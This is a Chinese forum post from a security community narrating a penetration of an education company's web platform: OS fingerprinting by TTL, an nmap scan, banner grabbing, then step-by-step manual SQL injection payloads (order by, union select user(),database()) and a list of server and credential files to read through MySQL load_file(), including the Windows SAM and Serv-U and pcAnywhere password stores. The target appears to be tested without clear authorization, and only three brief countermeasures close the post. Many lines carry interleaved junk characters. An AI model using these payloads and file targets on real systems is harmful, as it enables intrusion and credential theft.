找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2355|回复: 0
打印 上一主题 下一主题

记一次Linux系统PHP注入入侵检测

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-16 22:23:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
题记:
- N& e7 K2 B' N! I9 j一位朋友在某教育公司,一套网络教育平台。一年前,在2008年8月份的时候,我看到了这套平台,当时发现了个注入漏洞,测试了一下,得到一个可用帐户后就没有再继续下去。今天7月,又说到此事,我决定继续下去……
& z, S/ t: m7 c第一步:获取需要的信息# p& h% u5 N) E5 Z; n
由于之前测试过,知道此系统某处存在SQL注入漏洞。但由于时隔一年,岁月的远去已经深深的隐藏了那个SQL注入漏洞的地址,现在需要重新收集服务器有用信息。
; B4 L1 m9 g0 K" E注:以下为保护特用XXX代替敏感信息
5 s7 [0 @* P; L) ?: l6 R( X) \顺手先PING了一下他们的域名:
5 p( n7 d8 M5 A  Yping XXX.XXX.XXX.XXX(本文约定:用XXX.XXX.XXX.XXX代表测试IP和域名)" z' \3 @2 r8 y' p$ B: p
64 bytes from *********: icmp_seq=1 ttl=246 time=1.87 ms
- ^% Q8 Y! W& W# F0 m9 `顺便了解一下TTL,学好基础知识才能一路顺风:: k( V! h& F4 ?# f" d( ^
TTL:(Time To Live ) 生存时间
* \8 M5 K& {" T# b  }* `指定数据包被路由器丢弃之前允许通过的网段数量。1 K$ q: v" y  e+ _8 J& J
TTL 是由发送主机设置的,以防止数据包不断在 IP 互联网络上永不终止地循环。转发 IP 数据包时,要求路由器至少将 TTL 减小 1。8 R' V! v  l9 l/ s* ?! j
使用PING时涉及到的 ICMP 报文类型
! z" Q5 T2 S! |% J0 V5 A  u: c0 k一个为ICMP请求回显(ICMP Echo Request)6 Z! ~+ O& m& t- G
一个为ICMP回显应答(ICMP Echo Reply)
. o0 Y; d' f/ a# ?6 q9 ETTL 字段值可以帮助我们识别操作系统类型。
) Z+ a! t* J: p0 M  SUNIX 及类 UNIX 操作系统 ICMP 回显应答的 TTL 字段值为 255
; b* p/ Z" ]1 U1 G8 f- nCompaq Tru64 5.0 ICMP 回显应答的 TTL 字段值为 64
$ ]) e* F1 y$ o+ ~" O* [4 V. ^. W6 e微软 Windows NT/2K操作系统 ICMP 回显应答的 TTL 字段值为 1284 t( v2 ]  j# }( o  T% Q
微软 Windows 95 操作系统 ICMP 回显应答的 TTL 字段值为 32
) Q) g1 @" j- k2 e( x  Q当然,返回的TTL值是相同的
- i" @0 f4 e$ E# I( L' |4 h& Q但有些情况下有所特殊' A& I; f* W6 {8 E* |
LINUX Kernel 2.2.x & 2.4.x ICMP 回显应答的 TTL 字段值为 64  b. }; J' n  X0 m" T! z
FreeBSD 4.1, 4.0, 3.4;
" I/ l/ W& B0 P7 }; d0 B" n8 RSun Solaris 2.5.1, 2.6, 2.7, 2.8;
6 d  @" c7 O. s2 A. N) L4 gOpenBSD 2.6, 2.7,
+ g; x7 F# d) \# JNetBSD; `2 s5 G0 Y- E* V/ F" `0 y; Q. B
HP UX 10.20
4 Y6 ]0 W" t( S! OICMP 回显应答的 TTL 字段值为 255
! _8 S+ m3 R: tWindows 95/98/98SE
" Q+ o  [9 Y$ x' N$ mWindows ME
* c0 p/ D) d( }$ Y7 x2 JICMP 回显应答的 TTL 字段值为 321 B$ M+ }) p2 q4 _
Windows NT4 WRKS
+ z" V; n9 T  F% C2 C6 U4 T# IWindows NT4 Server! B: j) y/ _% Z  v$ M. h
Windows 20008 x9 e$ Q) z* ?/ y, W/ T
Windows XP
$ R. t! r% P7 n) h- z4 m) c9 bICMP 回显应答的 TTL 字段值为 128
' X4 I7 ~' Y, J, M9 |这样,我们就可以通过这种方法来辨别操作系统
) D/ s, O; g6 A9 @4 }! E& r. G* U3 LTTL值的注册表位置HKEY_LOCAL_MACHINE\SYSTEM \CurrentControlSet\Services\Tcpip\Parameters 其中有个DefaultTTL的DWORD值,其数据就是默认的TTL值了,我们可以修改,但不能大于十进制的255& P3 p/ ?0 h& S$ d4 T
用NMAP扫描一下:
2 ]6 r0 y+ X$ mnmap -sT -O XXX.XXX.XXX.XXX2 b5 y+ P# S6 {) S% W6 |8 l) x
如果没有装WinPcap则会弹出提示:
5 ~+ F  L! n+ ^; R' ~2 cWARNING: Could not import all necessary WinPcap functions.  You may need to upgr
$ Q# B6 C6 \0 U) s* Kade to version 3.1 or higher from http://www.winpcap.org.  Resorting to connect(
* E; W; G7 J# v0 Q% C, [) mode — Nmap may not function completely6 h3 b6 g# [( F$ ~& `
TCP/IP fingerprinting (for OS scan) requires that WinPcap version 3.1 or higher& g$ w3 X& k; u' g8 W4 S7 l+ N
and iphlpapi.dll be installed. You seem to be missing one or both of these.  Win; G# f. O' T1 n8 b/ B: W1 W
pcap is available from http://www.winpcap.org.  iphlpapi.dll comes with Win98 an" Y0 C. O+ q" F3 Z, [
d later operating sytems and NT 4.0 with SP4 or greater.  For previous windows v/ H6 W% {+ P$ x/ y5 c9 n7 m% H- N* Z
ersions, you may be able to take iphlpapi.dll from another system and place it i
  a; U" a7 }/ I4 C) d) E, Gn your system32 dir (e.g. c:\windows\system32).) ?2 w, m; ~) T7 g
QUITTING!
6 y) w1 s- U) J- r到这里下载: http://www.winpcap.org/install/bin/WinPcap_4_1_1.exe0 P3 \5 \3 a- v3 T6 z; u) h/ o
安装后继续执行刚才的命令,等待扫描完毕后得到入下信息:4 z. `. t( F" A6 U$ d7 }
Interesting ports on XXX.XXX.XXX.XXX:
$ L; L9 Y3 J5 {% U0 \" t1 HNot shown: 986 closed ports
+ N- w& x5 t' s/ r9 ^PORT     STATE    SERVICE5 M2 o- O0 v( M1 R" s' u7 }; D; t: q
21/tcp   open     ftp; c. D: l! ]/ X& y
22/tcp   open     ssh* @3 e3 ?% W+ Y- F1 s1 q
23/tcp   open     telnet- h" v- Q1 R# M& l6 k9 v
80/tcp   open     http% h5 N8 r* J0 ~, \, }  M! p- Z7 ?/ f
111/tcp  open     rpcbind
- W6 m  }3 k' J# z135/tcp  filtered msrpc. E, o  v! s( F* n+ ^
139/tcp  filtered netbios-ssn
; t, Q' J% y, Y$ I' h445/tcp  filtered microsoft-ds; l8 c4 ^& Y# U% h+ E
513/tcp  open     login
+ `+ J% a6 v3 p% P! ]% {514/tcp  open     shell7 e# E, t5 I0 J( @
593/tcp  filtered http-rpc-epmap
* I3 Z- N2 R% {/ D1720/tcp filtered H.323/Q.931
0 V4 k! m: F" F. |" ~" u4 c3306/tcp open     mysql+ V% T; _3 ^. e5 ?* ~9 ^, W3 S% M
4444/tcp filtered krb524: ]+ f1 }, M, q; X
Device type: WAP
: r' @* N- l0 r7 qRunning: Linux 2.4.X
  ~( j2 j9 \% [* b9 p. xOS details: DD-WRT (Linux 2.4.35s)% X$ `7 ~* e( t
Network Distance: 13 hops9 ]- a0 x& X. B
看到SSH22端口是开着的,打开putty试一下,看是否可以正常连接:
3 y3 M5 [7 {3 I- t! a% n3 _3 ?login as:
: O  X* U0 Q1 bTelnet23端口也是开着的,用telnet 命令链接一下:6 A- w2 _# \' f; {2 s+ F5 r
telnet XXX.XXX.XXX.XXX
* A5 S& V5 `) r! b, c提示:2 P3 D% X! j9 n+ c1 ]
Red Hat Enterprise Linux Server release 5.2 (Tikanga)
/ l- K9 K7 W( N; X/ B% d6 uKernel 2.6.18-92.el5PAE on an i686
( Z# s: c" A) e+ `: `login:
' L9 d) X+ Z$ j  N" B) [" T获取HTTP头信息:! h( F6 v% [1 U$ s* n7 C6 E4 [
在本地执行如下PHP代码0 r: z0 N  r( U: F1 S" ], y! ]
<?php
% @/ B% C9 i3 {& X* P2 s8 O: l: s$url = ‘XXX.XXX.XXX.XXX’;
' q+ ?8 }" _/ _9 F4 ]print_r(get_headers($url));
8 q# `/ \4 o4 c/ F1 M2 w  L0 H# cprint_r(get_headers($url, 1));& k4 O8 J7 e" h( ?( {
?>
9 T$ C: y3 E7 R3 P, N将以上代码保存为PHP文件,执行:. a% t' F( c1 o( q! D- [
Array ( [0] => HTTP/1.1 200 OK [1] => Server: nginx/0.7.61 [2] => Date: Mon, 02 Nov 2009 09:06:48 GMT [3] => Content-Type: text/html; charset=gb2312,gbk,utf-8 [4] => Content-Length: 75 [5] => Last-Modified: Thu, 20 Aug 2009 19:35:37 GMT [6] => Connection: close [7] => Accept-Ranges: bytes ) Array ( [0] => HTTP/1.1 200 OK [Server] => nginx/0.7.61 [Date] => Mon, 02 Nov 2009 09:06:48 GMT [Content-Type] => text/html; charset=gb2312,gbk,utf-8 [Content-Length] => 75 [Last-Modified] => Thu, 20 Aug 2009 19:35:37 GMT [Connection] => close [Accept-Ranges] => bytes )
& L: K# T7 t* z& u现在可以得出结论:
" h4 z" k: l7 L系统版本:Red Hat Enterprise Linux Server release 5.2 (Tikanga)3 V$ x/ ?0 p  R. @" X
内核版本:Kernel 2.6.18-92.el5PAE on an i6867 q  T- q/ A2 F# ^$ S
WEB服务器版本:nginx/0.7.61
: h- ^3 ^# }4 C6 S第二步,开始测试寻找漏洞
& r: t3 k* i* a6 n2 D) X分析是否存在注入漏洞,因为上次曾发现存在过,所以注入则是我们的首选。
5 `/ F' o- j6 @4 E! j1、敏感地址:站内存在有类似:http://www.fovweb.com/XXX.php?id=123 这种地址,属动态传参的
/ N$ S, h4 `7 K2、测试方法:在地址后加 and 1=1 和 and 1=2 测试1 C# [+ H5 X8 x
http://www.fovweb.com/XXX.php?id=123 and 1=1 返回正常6 x- P& @' ]% g3 y6 x' r
http://www.fovweb.com/XXX.php?id=123 and 1=2 返回错误2 }8 X$ z  o7 R! R1 Z
恭喜,两次返回结果不同,则很有可能存在未过滤敏感字符而存在SQL注入漏洞,我们继续. h# J  l5 b) u3 `) c& ]6 b9 o7 H
3、手工注入:
+ S) p8 `% y5 ?2 T; m0 W/ F  h: d1 X注入也应该有个思路,不能随便碰运气,要记住入侵检测不是靠运气而走下去的,要靠的是清晰的思路、过硬的技术、很全的知识面。& T+ h1 ?2 Z, s+ ^6 V7 |
3.1 猜测当前表字段数# x7 u+ t. r& o4 L1 r
http://www.fovweb.com/XXX.php?id=123 and 1=1 order by 10! d# w7 [6 \3 o# R
此处猜测有个简单的算法,都是有技巧的吗,呵呵
: l6 Y' ^$ w' G' U5 D/ Z" M& n- f4 x  G算法简单如下:
1 w+ W$ f# c" d& S! A1 k第一步:根据页面信息,大概估算一个数值,这个是要靠一定的经验了;
, t" W. H' [3 J- k第二步:取中算法,好比是10,如果返回错误,则取中间值5进行下一次猜测;
, d' c% m  z* ?$ ?需要注意:如果所选数值在字段数范围内即小于等于,则会(返回正常);如果所选数值在字段范围外即大于等于,则会(返回错误)。
2 n7 g/ x5 K* f# A5 V  I7 L以此来判断,是否过界,配合取中算法猜出字段数。
* E( w) f$ s; j1 L举例:8 P) v9 A; F# y
http://www.fovweb.com/XXX.php?id=123 and 1=1 order by 3 返回正常2 [# C% ?5 x9 k$ s' F8 s1 h$ P" f
http://www.fovweb.com/XXX.php?id=123 and 1=1 order by 4 返回错误
/ ~4 b8 S7 N7 m* A此时3则为我们要找的字段数。1 t6 W! v4 }" S
3.2 配合union联合查询字段在页面所位置
7 v1 T- s4 \, o+ R我们已经知道了字段数为3,此时则可以做如下操作:
9 r1 W6 d: z3 p8 B, R) j6 o& }http://www.fovweb.com/XXX.php?id=123 and 1=2 union select 1,2,3
5 }  t; [. f3 X0 y
( s. L$ u) {+ B1 V) d这样就可以测试到哪些字段在页面上有所显示了,如图:
, O- |% w( j& A" b- c! j2 @4 I: y' t; [( o. e" }/ |* |0 E$ J! ^
3.3 查敏感信息0 ~3 d+ m/ O3 F+ w
这也是个思路问题,我们需要什么,其实到了这一步已经能做什么多事情了。) |+ l$ e/ H" p. x; I. x
http://www.fovweb.com/XXX.php?id=123 and 1=2 union select 1,user(),database()0 D# P3 i, `' `+ c' f* {$ s
3.3.1 先查数据库用户、数据库名,以备后用,如图:
, ?7 U4 g& Y% E8 |
% c+ B. T: M" j0 f% A得到数据库用户为root、数据库名为DBxx;% _  l2 [* s/ w6 p, ^" u
3.3.2 查配置文件
( {7 A( o( Z7 a$ k' h  p. `查配置文件,就是指查看系统敏感的文件,如web服务器配置文件等。- |! W' B1 N8 |+ Z$ F
查看文件有一定的条件限制:! e: p, V6 c$ u8 g4 b
欲读取文件必须在服务器上" S& z3 ?  ~/ F3 B: W
必须指定文件完整的路径7 _# I/ j* R6 \% ^  l. J7 W
必须有权限读取并且文件必须完全可读: ^/ H! w" B2 C* n( [
欲读取文件必须小于 max_allowed_packet7 I! g4 I4 p0 x% |5 j! u
MYSQL注入中,load_file()函数在获得webshell以及提权过程中起着十分重要的作用,常被用来读取各种配置文件。
9 l: e1 ]8 {4 G0 ^. s4 C常用的一些:1 q/ [" ]8 [8 G$ y: l, o7 \
/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件8 D7 c; D: J" p3 q8 u1 q
/usr/local/apache2/conf/httpd.conf
0 F4 d) Y8 _: |% i; W/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置9 t* ^/ O. J$ o4 |/ E! q/ W
/usr/local/app/php5/lib/php.ini //PHP相关设置* [6 P9 K% b; f
/etc/sysconfig/iptables //从中得到防火墙规则策略
+ g( Q( k, h! W6 @) Y9 w7 y( L/etc/httpd/conf/httpd.conf // apache配置文件
. G! Q; L) V4 ], V# O) P. b# w& L1 u9 |/etc/rsyncd.conf //同步程序配置文件
; n$ g) r2 H/ B" `3 i/etc/sysconfig/network-scripts/ifcfg-eth0 //查看IP.7 T1 `: S+ p1 ^5 A, V
/etc/my.cnf //mysql的配置文件
3 P2 T, @7 y' Q2 m  d8 A1 F/etc/redhat-release //系统版本
% v7 N( d6 z8 D& Z+ z- P! o$ c: Y/etc/issue
, A" {2 H- r8 h/etc/issue.net
9 O2 C! \5 ]& i4 o" kc:\mysql\data\mysql\user.MYD //存储了mysql.user表中的数据库连接密码$ P: U& M# Y1 j! ?0 ?
c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini //存储了虚拟主机网站路径和密码
) r; D/ K% ~- q- n% _( E/ p! H& Pc:\Program Files\Serv-U\ServUDaemon.ini
- r& H! o1 E' Ac:\windows\my.ini //MYSQL配置文件- m% r  ~$ F! ]
c:\windows\system32\inetsrv\MetaBase.xml //IIS配置文件" a1 i4 k% c  V
等等。实际上,load_file()的作用不止于此,它还可以用来读取系统中的二进制文件,
: A" ~* s3 [- X( rc:\windows\repair\sam //存储了WINDOWS系统初次安装的密码
8 d9 x/ a% K% Y# q$ O* Hc:\Program Files\ Serv-U\ServUAdmin.exe //6.0版本以前的serv-u管理员密码存储于此+ J4 d( l: g% P* G1 \( U5 ~- W
c:\Program Files\RhinoSoft.com\ServUDaemon.exe0 L# q# l* u4 L0 V
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件
1 ^4 l) {+ p& Z* F//存储了pcAnywhere的登陆密码
5 o. Q9 f+ {+ m& z% ?! f- J由于之前得到信息,此台服务器是采用的nginx做的Web服务器,那我们就来试着找一下nginx的安装路径吧。
+ u. l" A6 @/ X$ B这个没有技术性可言,纯靠经验和运气,由于很少用nginx不了解,我就先到网上搜索常用的安装路径,以及比较好的配置文档中的安装路径进行测试,最终,得到nginx安装路径“/usr/local/nginx/conf/nginx.conf”。) B) b! h& o4 ^- Q4 k
最后:防范措施3 b- k! t! ^6 K0 x8 m6 _" w
1、修复PHP注入漏洞;) j( `4 {3 Q6 k  _! h/ J1 B& U
2、Mysql使用普通权限的用户;
9 ?( ?9 W& Q$ ?, J; M3、升级linux内核至最新版本;
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表